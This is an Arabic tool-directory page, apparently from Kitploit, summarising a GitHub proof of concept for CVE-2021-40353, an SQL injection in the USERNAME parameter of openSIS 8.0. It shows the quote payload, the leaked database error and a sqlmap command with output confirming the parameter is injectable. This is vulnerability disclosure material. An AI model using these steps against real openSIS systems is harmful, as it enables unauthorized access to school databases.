Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40353 — CVE-2021-40353 openSIS 8.0 ثغرة حقن SQL | Kitploit
أدوات/GitHubGitHub/5qu1n7/cve-2021-40353
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHub5qu1n7/cve-2021-40353

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 ثغرة حقن SQL

عرض المستودع
522منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40353

CVE-2021-40353 ثغرة حقن SQL في openSIS 8.0 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

توجد ثغرة حقن SQL في الإصدار 8.0 من openSIS عند استخدام MySQL أو MariaDB كقاعدة بيانات للتطبيق. يمكن للمهاجم إصدار أمر SQL عبر معامل USERNAME.

صفحة PHP القابلة للاستغلال:

index.php - معامل USERNAME

الحمولة القابلة للاستغلال ' - سينتج خطأ مع معلومات قاعدة البيانات " - لا ينتج الخطأ

الخطأ

التاريخ:

08/31/2021 03:16:22

إشعار الفشل:

فشل تنفيذ قاعدة البيانات

SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') التتبع: C:\xampp\htdocs\opensis\index.php at 502 معلومات إضافية: لديك خطأ في تركيب SQL؛ راجع الدليل المطابق لإصدار خادم MariaDB للحصول على التركيب الصحيح بالقرب من ''user1'')' في السطر 1 التاريخ:

08/31/2021 03:16:22

واجه openSIS خطأ قد يكون ناتجًا عن أي مما يلي:

root@kitploit:~
إدخال بيانات غير صالح
خطأ SQL في قاعدة البيانات
خطأ في البرنامج

يرجى أخذ لقطة شاشة وإرسالها إلى ممثل openSIS الخاص بك لتصحيح الأخطاء وحلها.

sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

اكتشف بواسطة Brian Lowe، أغسطس 2021

تنزيل الأداة